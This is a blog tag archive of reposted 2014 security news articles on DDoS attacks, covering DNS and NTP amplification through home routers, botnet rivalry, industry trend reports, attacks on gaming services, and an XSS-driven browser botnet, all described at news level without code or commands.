Tag Archives: ddos

Attackers use reflection techniques for larger DDoS attacks

Akamai announced a new global DDoS attack report, which shows that in Q1, DDoS attackers relied less upon traditional botnet infection in favor of reflection and amplification techniques. “Instea…

Read More:
Attackers use reflection techniques for larger DDoS attacks

There is no place like home gateway for DDoS attackers

Home gateway routers are being targeted by cybercriminals launching denial-of-service attacks They are standard pieces of kit, without which no home or small office can connect to the internet. And millions of them harbour a security vulnerability that threatens to do untold damage to the workings of the web. Welcome to the humble home gateway – the little routers sitting on our desks are being inducted into battle by criminals launching denial-of-service (DoS) attacks to bring down websites and hold organisations to ransom. A subtle flaw in some home gateways (they act as ‘open DNS proxies’) allows attackers to use them for ‘amplification’ where very small DNS queries (50 bytes) generate very DNS large answers (4 , 000 bytes). Attackers employ another simple trick – IP address spoofing – to disguise their own identity and cover their tracks while directing waves of traffic to any target they choose, anywhere on the internet. An amplification attack can create and send a target trillions of bytes of unwanted data over a few hours. The attack on Spamhaus in 2013 generated traffic measured at an enormous 300Gb/s. Many web resources aren’t equipped to deal with such large volumes of traffic and either become unavailable, or slow down to the point where visitors notice.  There is also considerable collateral damage to the infrastructure over which these attacks are launched. These attacks are effective because the amplification effect makes the results wildly disproportionate to the effort needed to launch them. Moreover, home gateways acting as DNS proxies make queries appear legitimate to DNS resolvers and mask the ultimate targets of attacks. As such, they are becoming the weapon of choice for those who aim to damage or hold to ransom any target they wish with impunity. Nor is there any shortage of opportunity for these criminals.  Research has found there are 24 million home gateways (home routers) that can be used for amplification attacks. These exploitable routers exist across the globe and it is not a problem limited to developing nations. For online criminals, there really is no place like ‘home’ from which to launch an attack. One of the systems most impacted by DNS amplification attacks are ISP resolvers.  The fact they’re typically provisioned with ample network bandwidth and deployed on high-performance hardware to ensure they are always responsive and highly available make them ideal for attackers, as they can piggyback on someone else’s high performance infrastructure. ISPs get drawn directly into the mire when open DNS proxies on home routers forward queries received on their WAN interface to whatever DNS resolver they are configured to use.  In most cases this is an ISP ’ s resolver (consumers may also configure alternative DNS services from Google and others), and even those who go to great lengths to protect their infrastructure can become collateral damage in the path on an attack. Bandwidth taken up by DDoS traffic causes networks to suffer from congestion and lowered performance. If quality of service falls noticeably, customers will vote with their feet and walk away to another service provider. And the ultimate recipients of the traffic, the targets themselves, often legitimately enquire about what ISP have done to limit the effects of attacks. Since this vulnerability provides enormously rich pickings for criminals at little cost, fixing it should be a priority for ISPs. As with any type of online threat, denial-of-service attacks are protean in nature; they evolve and adapt to circumvent attempts to prevent them. Unfortunately, existing perimeter defences are useless against this new generation of attacks because they’re designed to deter DDoS traffic coming into a provider network instead of traffic going out. What’s called for is the applications of DNS-based security intelligence techniques; by incorporating DNS-level security tools, organisations and ISPs can effectively counter amplification attacks. Deterrence starts with monitoring DNS query data as it is generated so suspicious activity on the network can be identified quickly. Something else that’s needed is dynamic threat lists that track special purpose-built DNS domains designed and deployed specifically for these kinds of attacks. To eliminate false positives, it’s also crucial these lists are carefully vetted. Servers should be configured with highly targeted filters to manage malicious traffic, while ensuring legitimate traffic is not affected. Additional rate limits based on response size can catch malicious traffic not caught by other filters. And, following best practice, DNS data logging is also useful for forensics and reporting. DNS-based security can be used by network operators in a layered security approach. The insidiousness of malware threats requires a defence-in-depth strategy based on various layers of firewalls, packet filters, anti-virus software, intrusion detection and prevention, and many more. Owing to its strategic place in the network, DNS-based security must be added to this portfolio of protection: observing, as it does, every Internet communication, it serves as a lightweight but powerful tool in the armoury. For far too long, people have unknowingly been hosting a serious security weakness in their houses and in their offices. With DNS-level security we can finally plug this breach, and turn the home once more into a castle. Source: http://www.information-age.com/technology/security/123457905/there-no-place-home-gateway-ddos-attackers

Read More:
There is no place like home gateway for DDoS attackers

Bot masters in cut-throat DDoS fight

DDoS reaches 300,000 connections a minute. Botnet operators in the criminal underground are launching large denial of service attacks against each other in a bid to knock out rivals in the race to compromise computers. Security researchers have discovered command and control servers owned by operators of Zeus botnets were blasted by those running a rival Cutwail botnet in a distributed denial of service attack reaching 300,000 connections a minute. The infamous Zeus malware was a trojan often used to steal banking information and install cyrptolocking software. The Zeus family was considered to be the largest botnet operating on the internet. Cutwail is also an established botnet which is typically involved in sending spam via the Pushdo trojan, at its peak pushing out millions of emails a day. University researchers said in a paper that Cutwail, known to spammers as ’0bulk Psyche Evolution’, was rented to spam affiliates who pay fees to the botmasters totalling hundreds of thousands of dollars, in order to launch spam campaigns (pdf). RSA researchers found a hit list of new dynamically generated domain names within a Cutwail botnet which served as infrastructure targets of the operator’s rivals. A senior threat researcher that runs under the handle ‘Fielder’ wrote he was surprised to find evidence of the continual fighting. “This is an incredibly interesting finding as it suggests some fierce competition within the criminal underground,” Fielder said. “This was quite literally a live action view of botmasters attacking one another.” The research team examined the attacked IP addresses and found that each was related to Zeus and Zbot (Zeus) command and control hosts. The attacker’s IP addresses were tracked since August and linked to Zeus and kryptik trojans and variants, as well as Bitcoin mining activity. These addresses were also embroiled in a “long history” of malware campaigns including those foisting the formerly infamous BlackHole exploit kit, spam campaigns and an effort to serve malware over IRC and BitTorrent. Source: http://www.itnews.com.au/News/382411,bot-masters-in-cut-throat-ddos-fight.aspx?utm_source=feed&utm_medium=rss&utm_campaign=editors_picks

More:
Bot masters in cut-throat DDoS fight

DDoS attacks: Bigger, Badder and Nastier than last year

DDoS bots are evolving, developing immunity to cookie and JavaScript challenges along the way. A raft of next-generation DDoS attacks have marked the first months of 2014, says a new report from Incapsula, which notes that large-scale SYN floods attacks now account for a hefty 51.5 percent of all large-scale attacks. The research – which covers the whole of 2013 and the first two months of 2014 – says that 81 percent of DDoS attacks seen in 2014 are now multi-vectored, with almost one in every three attacks now above 20 Gbps in data volume terms. The analysis – entitled the `2013-2014 DDoS Threat Landscape Report’ – says that application (Layer 7) DDoS attacks are becoming a major headache for IT professionals as this year progresses, with DDoS bot traffic up by 240 percent in the three months to the end of February this year. Interestingly, Incapsula says that 29 per cent of botnets have been seen attacking more than 50 targets a month. The analysis – which is based on 237 network DDoS attacks that exceeded 5 Gbps and targeting Web sites on Incapsula’s network – concludes that DDoS bots are evolving, developing immunity to cookie and JavaScript challenges along the way. In fact, says Incapsula, during the final quarter of 2013, the firm’s research team reported the first encounter with browser-based DDoS bots that were able to bypass both JavaScript and Cookie challenges – the two most common methods of bot filtering. The problem, concludes the report, is that the DDoS attack perpetrators are now looking to raise the stakes even higher by introducing new capabilities, many of which are specifically designed to abuse the weaknesses of traditional anti-DDoS solutions. As a result, in 2014, the research predicts, many IT organisations will need to re-think their security strategies to respond to latest Layer 3-4 and Layer 7 DDoS threats. According to Barry Shteiman, Director of Security Strategy with Imperva, the report exposes advancements in both network and application layers. The most interesting take-out from the report, he says, is that the application DDoS attacks are now originating in botnets. “Last year we wrote extensively about the trend on CMS hacking for industrialised cybercrime where attackers use botnets in order to turn onboard infected machines into botnets and then use those as platforms for network and application attacks,” he said. “For DDoS attacks, it just makes sense. When a hacker has the power of masses with a large botnet, there are great opportunities to disrupt service. When servers are being infected rather than user’s computers, it’s even worse, just because of the bandwidth and computing power that becomes available to the hacker,” he added. Ashley Stephenson, CEO of Corero Network Security, said that it is essential that the governments take a more active role in encouraging private sector organisations to address the issue of DDoS attacks – and to put in place the appropriate plans to deal with these unavoidable security risks to their business and the nation’s financial infrastructure. “As consumers saw in late 2012 and early 2013, in both the US and UK, banks and financial institutions were successfully targeted by attacks which compromised their online services,” he told SCMagazineUK.com . The Corero CEO went on to say that his company believes that mandated controls – like those recently proposed by the Federal Financial Institutions Examination Council (FFIEC) – will drive organisations to take pro-active steps to regaining control of their online presence. “These mandates, at a minimum, offer guidance for financial institutions for appropriate DDoS activity monitoring and adequate incident response planning, this will ultimately lead to the deployment of more effective DDoS defence solutions,” he explained. Source: http://www.scmagazineuk.com/ddos-attacks-bigger-badder-and-nastier-than-last-year/article/342078/

Read More:
DDoS attacks: Bigger, Badder and Nastier than last year

DDoS attacks target online gaming

Distributed denial of service (DDoS) attacks are not limited to enterprises; we have recently seen a string of DDoS attacks hitting the gaming industry, says senior engineer at F5 Networks, Martin Walshaw. “The attacks have become more frequent, particularly in the professional gaming scene where large sums of money are available,” explains Walshaw, adding that this presents a fresh concern for competitive gamers, as Internet protocol addresses of individual players, as well as servers, being increasingly targeted. DDoS attacks are designed to make a service unavailable to its intended users, according to Walshaw, they typically target banking sites and credit card payment gateways, but lately there has been a marked increase in attacks targeting gaming sites. “InfoSecurity Magazine reports that in February the number of network time protocol (NTP) amplification attacks increased 371.43%. The average peak DDoS attack volume increased a staggering 807.48%, prompting Prolexic Technologies to issue a high alert threat advisory on NTP amplification DDoS attacks – but it was too late for Wurm and League of Legends.” Walshaw cites a recent article on BBC News, which revealed that Wurm is among the latest games to have been hit, with an attack knocking the multiplayer servers offline for two days between 18 and 20 February. For the developer, this is a major inconvenience, he says, as the main selling point of the game is its multiplayer content – the more prolonged the attack, the more damage it does to the brand. “For most gamers, these attacks are frustrating and inconvenient. Wurm’s creators were forced to migrate to new servers and offered a bounty of €10 000 for information that would lead to the perpetrator/s. Also in February, the League of Legends site suffered two DDoS attacks in 24 hours, described as the “biggest [attack] of its kind” against the game since its inception.” However, notes Walshaw, in electronic sports competitions, which offer professional gamers considerable sums of money in tournaments, DDoS attacks are more than just an inconvenience; they can have a significant impact on the results of a game. Last year, several rounds of a popular DOTA 2 tournament had to be postponed after persistent DDoS attacks in qualifying rounds. In competitions where reactions delayed by a fraction of a second can result in failure and lost funds, a slow connection can be a serious issue. “DDoS attacks are increasingly prevalent and show no signs of losing popularity with cyber criminals. Experts expect these enormous volumetric attacks will gain popularity due to the fact that they leverage existing DNS servers on the Internet – there is no need to recruit one’s own botnet, or even rent one,” he states. “Large cyber-attacks are capable of knocking out business-critical applications that generate revenue and facilitate communications, which can have severe business impacts. Organisations that depend on their online presence for survival absolutely need to invest in security solutions that protect themselves, staff, customers and end-users against these attack vectors.” According to John Grady, research manager for security products at IDC, DDoS attack methods have become much stealthier and are increasing in frequency, volume and application specificity. To ensure protection against these threats, he urges organisations to consider a defence-in-depth posture for DDoS defence. Grady adds that one important component is the on-premises appliance, key in detecting and mitigating advanced application, SSL and volumetric attacks. “Whether these kinds of DDoS attacks are the work of mischief makers, sore losers or even attempts to sabotage rivals, is unclear. What is clear is that defending against DDoS attacks is not just the province of private and public sector businesses,” observes Walshaw. He concludes that these attacks have become more prevalent and have amplified over the last year; we can expect to see a lot more of them, with even greater power, across different sectors, throughout this year. Source: http://www.itweb.co.za/index.php?option=com_content&view=article&id=111708:DDoS-attacks-target-online-gaming&catid=218

Continue Reading:
DDoS attacks target online gaming

How a website flaw turned 22,000 visitors into a botnet of DDoS zombies

Researchers have uncovered a recent denial-of-service attack that employed an unusual, if not unprecedented, technique to surreptitiously cause thousands of everyday Internet users to bombard the target with a massive amount of junk traffic. The attack worked by exploiting a Web application vulnerability on one of the biggest and most popular video sites on the Web, according to a blog post published recently by researchers at security firm Incapsula, which declined to identify the site by name. Malicious JavaScript embedded inside the image icons of accounts created by the attackers caused anyone viewing the users’ posts to run attack code that instructed their browser to send one Web request per second to the DoS victim. In all, the technique caused 22,000 ordinary Web users to unwittingly flood the target with 20 million GET requests. “Obviously one request per second is not a lot,” Incapsula researchers Ronen Atias and Ofer Gayer wrote. “However, when dealing with video content of 10, 20, and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively created a self-sustaining botnet comprising tens of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.” The novel attack was made possible by the presence of a persistent cross-site scripting (XSS) vulnerability in the video site, which Incapsula didn’t identify except to say it fell in the Alexa top 50 list. XSS exploits effectively allow attackers to store malicious JavaScript on a website that gets invoked each time someone visits. The booby-trapped user icons contained an iframe tag that pulled malicious instructions off an attacker-controlled command and control server. The malicious instructions caused browsers to surreptitiously flood the DDoS target with an unusually high number of GET requests. Incapsula was able to mitigate the effects of the attack using a combination of progressive challenges and behavior-based security algorithms. Remember the Samy Worm? The attack is only the latest to harness the tremendous power of XSS vulnerabilities. The technique came into vogue in 2005 with the advent of the Samy worm. Named after its creator, a hacker named Samy Kamkar, the XSS exploit knocked MySpace out of commission for a day by forcing anyone who viewed his profile to become a MySpace friend. In less than 24 hours, Kamkar, who later served time in jail for the stunt, gained more than one million followers. “The nature and beauty of persistent XSS is that the attacker doesn’t need to target specific users,” Matt Johansen, senior manager of Whitehat Security’s threat research center, told Ars. “The malicious JavaScript is stored on the website and replayed to anybody who visits this in the future. This particular JavaScript forced each browser that was running it to make a request in one-second intervals.” Last year, Johansen and other colleagues from Whitehat Security demonstrated a proof-of-concept ad network that created a browser-based botnet using a technique that’s similar to the one Incapsula observed exploiting the XSS weakness. “The delivery mechanism [in the Incapsula-observed attack] was different as it was from persistent XSS in the site instead of an ad network,” Johansen explained. “The only difference there was how the malicious JavaScript was rendered in the user’s (bot’s) browser. The code that is quoted in the [Incapsula] article is using a very similar technique to the code we wrote for our talk. Instead of using (image) tags like we did, this attacker is using tags which then make one request per second. We were just loading as many images as possible in the time our JavaScript was running.” Incapsula’s discovery comes three months after criminals were observed using another novel technique to drastically amplify the volume of DDoS attacks on online game services and other websites. Rather than directly flooding the targeted services with torrents of data, an attack group sent much smaller sized data requests to time-synchronization servers running the Network Time Protocol. By manipulating the requests to make them appear as if they originated from one of the gaming sites, the attackers were able to vastly increase the firepower at their disposal. The technique abusing the Network Time Protocol can result in as much as a 58-fold increase or more. Miscreants have long exploited unsecured domain name system servers available online to similarly amplify the amount of junk traffic available in DDoS attacks. Incapsula’s finding underscores the constantly evolving nature of online attacks. It also demonstrates how a single weakness on one party’s website can have powerful consequences for the Internet at large, even for those who don’t visit or otherwise interact with the buggy application. Source: http://arstechnica.com/security/2014/04/how-a-website-flaw-turned-22000-visitors-into-a-botnet-of-ddos-zombies/

Visit site:
How a website flaw turned 22,000 visitors into a botnet of DDoS zombies

DDoS Attack on Ellie Mae site Suspects Attackers Had Industry Knowledge

The distributed denial-of-service attack that crashed Ellie Mae’s loan origination system was cleverly disguised and could have been carried out by individuals with mortgage industry expertise, the vendor says. The March 31-April 1 attack overwhelmed the company’s servers with data requests that had the look and feel of legitimate communications. Specifically, the attack flooded the servers with requests to a URL that is used to download an XML file containing a list of third-party technology vendors that integrate with the Encompass LOS via the Ellie Mae Network. “It was a massive number of requests that came in and consumed the full capacity of one set of our servers around a specific URL,” Ellie Mae President and Chief Operating Officer Jonathan Corr says in his first interview since the attack was disclosed. “Where a classic denial-of-service attack would be a request that comes in that is not valid and would just create a lot of failed attempts, this was a valid request with a normal signature.” The investigation into the incident is ongoing, but the manner in which the attack was carried out may indicate that it was carried out by people familiar with the mortgage industry. “I find it very coincidental that this was using a valid request and a normal signature, which if you look at just a random attack, that’s not typically the case,” Corr says. “And it occurred on the last day of the month and the quarter, starting first thing in the morning” — a critical time for loan closings. “That could be coincidence, I don’t have evidence otherwise, but we find it very disturbing and we’re trying to figure it out. It seems like that could be a possibility,” he adds. The XML file contains no sensitive data and is accessible through a so-called open request, which doesn’t require the type of authentication needed to access actual loan files in the system. The attack resembled data requests that would come from the smart client application used to access Encompass and the Ellie Mae Network. This similarity initially made the communications difficult to identify as a threat. “Because of the way it came in, it looked just like a request that we would expect and it wasn’t something that someone out there randomly could do,” Corr says. “Somebody obviously understood a basic public request that would come from an Encompass system.” Ellie Mae has hired Stroz Friedberg, a cyber-security and digital forensics investigation firm, to piece together evidence and trace the attack, evaluate Ellie Mae’s response to the incident, as well as validate that the vendor did not suffer a data or security breach. “We’re asking them to validate that so we can provide a third-party perspective to our customers so that they can turn around and let their regulators know,” Corr says. Ellie Mae, based in Pleasanton, Calif., has put protocols in place to defend against an attack of this nature, and Corr says the company will make additional investments “to further harden the walls” of its infrastructure. “We’re really focused on how to get even better at dealing with anybody that might try to affect the livelihood of our customers,” he says. Source: http://www.americanbanker.com/issues/179_65/ellie-mae-suspects-attackers-had-industry-knowledge-1066689-1.html

Visit site:
DDoS Attack on Ellie Mae site Suspects Attackers Had Industry Knowledge

24 million reasons to lock down DNS amplification attacks

Research from Nominum, a US security consultancy that supplies ISPs with DNS-based analytics and revenue advice, claims to show that 24 million home and small office broadband routers around the world are vulnerable to being tapped as part of a massive DDoS attack. Distributed-denial-of-service (DDoS) swarm attacks have been around for years, but hijacking routers is a relatively recent trend, driven largely by the fact that very few users actively update the firmware of their legacy routers. Rather than hack the host computer, Nominum says that the hackers can now manipulate DNS (Domain Name System) traffic lookups – the technology that translates alphabetic domain names (e.g. www.bbc.co.uk) into its numeric identifier (e.g. 987.65.43.21). By spoofing the target’s IP address and generating a small IP request (ICMP) to a vulnerable router, the router will then generate a larger IP data packet to the real IP address. Nominum claims that this `amplification’ effect can be tapped to turn a few megabits of data bandwidth into many tens of gigabits of bandwidth hogging IP streams. This is no theoretical analysis, as the consultancy claims to have spotted over 5.3 million home and office routers being hijacked during February to generate IP attack traffic – with as much as 70 per cent of total DNS traffic being attributed to one attack seen during January. Nominum says the effect on ISP traffic is immense, with trillions of bytes of attack data disrupting ISP networks, websites and individuals. In the longer term, the consultancy says there is a network impact generated by malicious traffic saturating the available bandwidth and a consequent loss of revenue as users migrate to other ISPs due to an apparently poor experience. Sanjay Kapoor, the SVP of strategy with Nominum, said that existing DDoS defences do not work against today’s amplification attacks, which can be launched by any criminal who wants to achieve maximum damage with minimum effort. “Even if ISPs employ best practices to protect their networks, they can still become victims, thanks to the inherent vulnerability in open DNS proxies,” he said. Peter Wood, CEO of pen-testing specialist First Base Technologies, says that the problem identified by Nominum is often found by his research team where remote branch offices and staff working from home are involved. “We’ve recently been testing a Draytek Vigor router in this regard, and the good news is that most of the attack ports that could be used are turned off by default. Conversely, we also tested a Buffalo router, where the exact reverse was true,” he explained. “This is the joy of OpenDNS proxies. It’s also not that obvious how to configure a fixed IP on many routers,” he said, adding that some clients are – thankfully – becoming more aware of the security risks from the amplification attacks identified by Nominum’s research. Sven Schlueter, a senior consultant with Context Information Security, said that DNS application attacks mean that only minimal resources are required to conduct an attack against the availability of a larger system or network. “This type of attack is then often performed from different sources, all spoofing the source ‘to origin from the target’, resulting in a DDoS against the available bandwidth of the targeted hosts and networks when content is returned from the legitimate DNS,” he said, adding that a number of mitigation solutions are now possible. “For example, a DNS server administrator can ensure that the resolver is not open to the Internet. Very rarely – usually only for service providers – is a resolver required to be open to the Internet. However, if necessary, rate limiting and monitoring can be applied to slow down, detect and mitigate attacks,” he said. “ISPs can also enforce restrictions so that spoofing of addresses is not possible. Service owners, such as a Web site administrator, can only slightly mitigate the issue by dynamically allocating more bandwidth and filtering the attack at the border/ISP core, to the network affected,” he added. Jag Bains, CTO of DDoS remediation specialist DOSarrest, said that is a need for focused DDoS protection services as his firm is seeing more and more attack vectors and agents emerge – something that he says is only going to increase as the `Internet of Things’ gains further traction. “Strategic decision makers will need to understand what specific assets need protection and in what specific manner, and ensure they buy the right solution,” he noted. Lamar Bailey, director of security research with Tripwire, said that home and small office modems, gateways and routers are a generally the second weakest link in a home/small office network behind printers. “Internet providers do update or use current technology for home user gateways and the end user is generally stuck with what every the provider gives them. The routers are generally on very old technology and not easy or possible to secure. DDoS and other attacks are very successful on these old routers,” he said. Bailey went on to say that the ISPs need to take security more seriously and help protect their consumers. “In the US each region has limited options for ISPs which is almost a monopoly. This is bad for consumers and great for attackers and bot herders,” he explained. “Internet providers do update or use current technology for home user gateways and the end user is generally stuck with what every the provider gives them. The routers are generally on very old technology and not easy or possible to secure. DDoS and other attacks are very successful on these old routers,” he said. Bailey went on to say that the ISPs need to take security more seriously and help protect their consumers. “In the US each region has limited options for ISPs which is almost a monopoly. This is bad for consumers and great for attackers and bot herders,” he explained. Source: http://www.scmagazineuk.com/24-million-reasons-to-lock-down-dns-amplification-attacks/article/341026/

More here:
24 million reasons to lock down DNS amplification attacks

24 million routers expose ISPs to DNS-based DDoS attacks

DNS-based DDoS amplification attacks have significantly increased in the recent months, targeting vulnerable home routers worldwide. A simple attack can create 10s of Gbps of traffic to disrupt provid…

Continued here:
24 million routers expose ISPs to DNS-based DDoS attacks

DDoS Trends Report Reveals Spike in Botnet Activity

A new study documenting distributed denial of service (DDoS) trends found an average of more than twelve million unique botnet-driven DDoS attacks are occurring weekly in the last 90 days, representing a 240% increase over the same period in 2013. “Unlike network DDoS attacks, Layer 7 attack sources can’t hide behind spoofed IPs. Instead they resort to using Trojan infected computers, hijacked hosting environments and Internet-connected devices,” the report stated “Large groups of such compromised resources constitute a botnet; a remotely controlled “zombie army” that can be used for DDoS attacks and other malicious activities.” Key findings on network (Layer 3 & 4) DDoS attacks included: Large SYN Floods account for 51.5% of all large-scale attacks Almost one in every three attacks is above 20Gbps 81% of attacks are multi-vector threats Normal SYN flood & Large SYN flood combo is the most popular multi-vector attack (75%) NTP reflection was the most common large-scale attack method in February 2014 Key findings on application (Layer 7) DDoS attacks included: DDoS bot traffic is up by 240% More than 25% of all Botnets are located in India, China and Iran USA is ranked number 5 in the list of “Top 10” attacking countries 29% of Botnets attack more than 50 targets a month 29.9% of DDoS bots can hold cookies 46% of all spoofed user-agents are fake Baidu Bots (while 11.7% are fake Googlebots) “2013 was a game-changing year for DDoS attacks, with higher-than-ever attack volumes and rapid evolution of new attack methods,” the report states. “Now, the perpetrators are looking to raise the stakes even higher by introducing new capabilities, many of which are specifically designed to abuse the weaknesses of traditional anti-DDoS solutions. As a result, in 2014, many IT organizations will need to re-think their security strategies to respond to latest Layer 3-4 and Layer 7 DDoS threats.” Source: http://www.tripwire.com/state-of-security/top-security-stories/ddos-trends-report-reveals-spike-botnet-activity/

Continued here:
DDoS Trends Report Reveals Spike in Botnet Activity